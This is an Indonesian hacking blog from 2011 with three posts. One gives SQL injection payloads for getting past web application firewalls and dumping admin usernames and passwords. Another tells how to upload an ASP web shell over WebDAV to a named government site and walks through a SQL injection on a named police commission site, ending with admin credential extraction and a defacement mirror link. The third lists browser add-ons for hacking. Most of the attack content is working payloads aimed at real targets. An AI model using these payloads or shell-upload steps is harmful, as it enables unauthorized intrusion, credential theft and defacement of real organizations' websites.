13 Oktober 2011

WAF Bypass (SQLi)


WAF adalah sebuah Firewall Aplikasi Web yang digunakan untuk memfilter request berbahaya (malicious requests) atau keyword pada websitew kita. Apakah WAF sebuah cara yang aman untuk melindungi Website saya? Tergantung dari program aplikasi anda, walaupun website kita sudah di lindungi sama WAF, akan tetapi tidak ada yang 100% aman.

Banyak cara yang dilakukan oleh injector untuk membypass security dari WAF ini.
Yakni dengan perintah - perintah yang akan melewati hadangan dari WAF.

Contoh - contoh perintah tersebut yakni :

Code : //, — , /**/, #, –+, — -, ;

1. Inline Comments

code : id=1/*!UnIoN*/+SeLeCT+1,2,concat(/*!table_name*/)+FrOM /*information_schema*/.tables /*!WHERE */+/*!TaBlE_ScHeMa*/+like+database()– -
 

2. Buffer Overflow:/Unexpected input:
 

code : id=1 and (select 1)=(Select 0xAAAAAAAAAAAAAAAAAAAAA 1000 more A’s)+UnIoN+SeLeCT+1,2,version(),4,5,database(),user(),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26
,27,28,29,30,31,32,33,34,35,36–+


3. Replaced keywords(preg_replace and/or WAF’s with the same action):


code : id=1+UNIunionON+SeLselectECT+1,2,3–

4. Charachter encoding:


code : id=1%252f%252a*/UNION%252f%252a /SELECT%252f%252a*/1,2,password%252f%252a*/FROM%252f%252a*/Users–+


-------------------------------------------------


Oke. berikut ini contoh - contoh serangan untuk membypass WAF tersebut ..

1. perintah order kolom :

index.php?id=1 order by 10-- Error
index.php?id=1 order by 9-- Error
index.php?id=1 order by 8-- Error
index.php?id=1 order by 7-- Error
index.php?id=1 order by 6-- Error
index.php?id=1 order by 5-- True


or :
index.php?id=1/**/order/**/by/**/10/*
index.php?id=1/**/order/**/by/**/9/*
index.php?id=1/**/order/**/by/**/8/*
index.php?id=1/**/order/**/by/**/7/*
index.php?id=1/**/order/**/by/**/6/*
index.php?id=1/**/order/**/by/**/5/*


2. perintah valid string 

index.php?id=-1 union select 1,2,3,4,5--
index.php?id=-1/**/union/**/select/**/1,2,3,4,5--
index.php?id=-1+un/**/ion+sel/**/ect+1,2,3—
index.php?id=-1+/*!UNION*/+/*!SELECT*/+1,2,3,4,5--


or :
 

index.php?id=-1/**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/1,2,3—

3. User, versi, data direktori, dsb :


index.php?id=-1 union select 1,2,database(),4,5--
index.php?id=-1 union select 1,2,user(),4,5--
index.php?id=-1 union select 1,2,version(),4,5--
index.php?id=-1 union select 1,2,@@datadir,4,5--


Cara menggabungkan :

index.php?id=-1 union select 1,2,group_concat(database(),0x3a,user(),0x3a,version()),4,5--


4. Lihat semua table :

index.php?id=-1 union select 1,2,group_concat(table_name),4,5 from information_schema.tables where tables_schema=database()--

index.php?id=-1/**/union/**/select/**/1,2,group_concat(table_name),4,5/**/from/**/information_schema.tables/**/where/**/tables_schema=database()--

index.php?id=-1+UNION+SELECT+1,2,GROUP_CONCAT(TABLE_NAME),4,5+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()--

index.php?id=-1+/*!UNION*/+/*!SELECT*/+1,2,GrOUp_COnCaT(TABLE_NAME),4,5+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()--
 

5. Lihat semua database :

index.php?id=-1+UNION+SELECT+1,2,GROUP_CONCAT(SCHEMA_NAME),4,5+FROM+INFORMATION_SCHEMA.SCHEMATA--
or:

index.php?id=-1+/*!UNION*/+/*!SELECT*/+1,GrOUp_COnCaT(SCHEMA_NAME),4,5+FROM+INFORMATION_SCHEMA.SCHEMATA-
-


6. Sekarang kita akan liat kolom dari table yang kita inginkan :

index.php?id=-1 union select 1,2,group_concat(column_name),4,5 from information_schema.columns where table_name=0x61646d696e

index.php?id=-1/**/ union/**/select/**/1,2,group_concat(column_name),4,5 from information_schema.columns where table_name=0x61646d696e

index.php?id=-1+/*!UNION*/+/*!SELECT*+1,2,GROUP_CONCAT(COLUMN_NAME),4,5+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x61646d696e

index.php?id=-1+/*!UNION*
/+/*!SELECT*+1,2,GrOUp_COnCaT(COLUMN_NAME),4,5+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x61646d696e
 

7. Langkah terakhir:

index.php?id=-1 union select 1,2,group_concat(user,0x3a,password),4,5 from admin--

index.php?id=-1/**/union/**/select/**/1,2,group_concat(user,0x3a,password),4,5 from admin--

index.php?id=-1+/*!UNION*/+/*!SELECT*/+1,2,GrOUp_COnCaT(user,0x3a,password,0x3a,email),3,4,5+FROM+admin—

index.php?id=-1+un/**/ion+sel/**/ect+1,2,GrOUp_COnCaT(user,0x3a,password,0x3a,email),3,4,5+FROM+admin—



Untuk Prof Of Concept silahkan kawan - kawan semua kembangan ketika melakukan injeksi. 
Akan tetapi untuk prof of concepnya saya juga akan buat tutorialnya nanti 

Salam ..



09 Oktober 2011

Acunetix Webdav on pu.go.id


Apa sih tuh WebDAV Vulnerability ? Coba cari di google aja.. haha
Tapi secara harfiah WebDAV adalah very vulnerable component of IIS servers  
Mari kita coba scan website pu.go.id dengan acunetix , and i got a WebDAV Vulnerability in pu.go.id Or u can use DAVtest .



Cari direktori yang di ijinkan untuk writeabilty ( bisa untuk kita sisipin file, dsb ) Example = www.localhost.com, www.localhost.com/images, dsb

Open windows explore, my pc use os windows 7 :p


Klik kanan Computer and add a network location

Just Next .. Next.. saja bro.
Ingat.. jika domain utama gak bisa, cari direktori yang mengijinkan kita untuk menyisipkan file sesuai dengan hasil scan dengan Acunetix.


Setelah itu next .. next .. saja.

Siapkan shell.asp, trus copy-paste shell kita to folder website victim :D 
Jangan lupa rename shell kita menjadi : shell.asp.;jpg or shell.asp.;txt
Tapi kita bisa menyisipkan file : .txt , html, htm dsb
----------------------------------------------- 

Mirror site in Zone-H



SQLi On Komisi Kepolisian



Tindakan saya bukan untuk merusak, tapi semata-mata hanya untuk media pembelajaran. Why ? 
Tujuannya agar kemanan website negara kita lebih di tingkatkan lagi . 
Sekali lagi saya minta maaf kalau ada kesalahan disini. Lets we start dude :

#[0x3a]. Chek the vull sql injection

http://www.komisikepolisianindonesia.com/secondPg.php?cat=video&view=34'

secondPg.php?cat=video&view=34 order 1-- false
secondPg.php?cat=video&view=34 order 2-- false
secondPg.php?cat=video&view=34 order 3-- false
secondPg.php?cat=video&view=34 order 4-- false
secondPg.php?cat=video&view=34 order 5-- false
secondPg.php?cat=video&view=34 order 6-- false
secondPg.php?cat=video&view=34 order 7-- false
secondPg.php?cat=video&view=34 order 8-- false
secondPg.php?cat=video&view=34 order 9-- false
secondPg.php?cat=video&view=34 order 10-- true

---> We've got the point to inject !

#[0x3b]. Chek the version database:

secondPg.php?cat=video&view=-134+union+all+select+1,2,3,4,5,6,7,8,9--

we've got a lucky number "2"

secondPg.php?cat=video&view=-134+union+all+select+1,version(),3,4,5,6,7,8,9--

- If version 5.0 = you lucky :D
- If version 4.0 = you dead :( [that's blind] hahaha ...

#[0x3c]. Tabel & column

secondPg.php?cat=video&view=-134+union+all+select+1,group_concat(table_name),3,4,5,6,7,8,9+from+information_schema.tables +where+table_schema=database()--

secondPg.php?cat=video&view=-134+union+all+select+1,group_concat(column_name),3,4,5,6,7,8,9+from+information_schema.columns +where+table_schema=database()--

Just switch

(table_name) --> (column_name)
from+information_schema.tables ---> from+information_schema.columns

Finally :

http://www.komisikepolisianindonesia.com/secondPg.php?cat=video&view=-134+union+all+select+1,group_concat(admin_id,0x3a,admin_password),3,4,5,6,7,8,9+from+inweb_admin--
---------------------------------------------------------------

Mirror Deface :

http://indonesiandefacer.org/mirror/2011/10/komisikepolisianindonesia.html




01 Oktober 2011

Add Ons For Hacking


Pasti semua udah tau ama add ons, yups aplikasi .xpi untuk menemani browser kita. atau kata lain aplikasi untuk browser, bukan untuk desktop . nah berikut ini adalah add ons yang banyak di gunakan untuk membantu dalam proses hacking.
Adblock Plus allows you to regain control of the internet and view the web the way you want to.

Allows you to customize the way a web page displays or behaves, by using small bits of JavaScript.

It allows JavaScript, Java and other executable content to run only from trusted domains of your choice, e.g. your home-banking web site, guarding your "trust boundaries" against cross-site scripting attacks (XSS), cross-zone DNS rebinding / CSRF attacks (router hacking), and Clickjacking attempts,

You can edit, debug, and monitor CSS, HTML, and JavaScript live in any web page.

Use tamperdata to view and modify HTTP/HTTPS headers and post parameters.

Sama seperti Tamper data

This toolbar will help you in testing sql injections, XSS holes and site security.

Server Spy indicates what brand of HTTP server (e.g. Apache, IIS, etc.) runs on the visited sites. When a tab is selected, the corresponding server name is shown on the right-hand side of the browser's status bar.

SQL Inject Me is the Exploit-Me tool used to test for SQL Injection vulnerabilities.

10. XSS Me
XSS-Me is the Exploit-Me tool used to test for reflected Cross-Site Scripting (XSS).

11. ShowIP
Show the IP address(es) of the current page in the status bar. It also allows querying custom information services by IP (right click) and hostname (left click), like whois, netcraft, etc.

This plugin lets you search on Offensive Security Exploit database.It has been tested using Mozilla Firefox 3.5.5 (on Linux and Windows)

This plugin lets you search on Packet Storm - www.packetstormsecurity.org - database. Packet Storm offers an abundant resource of up-to-date and historical security tools, exploits, and advisories.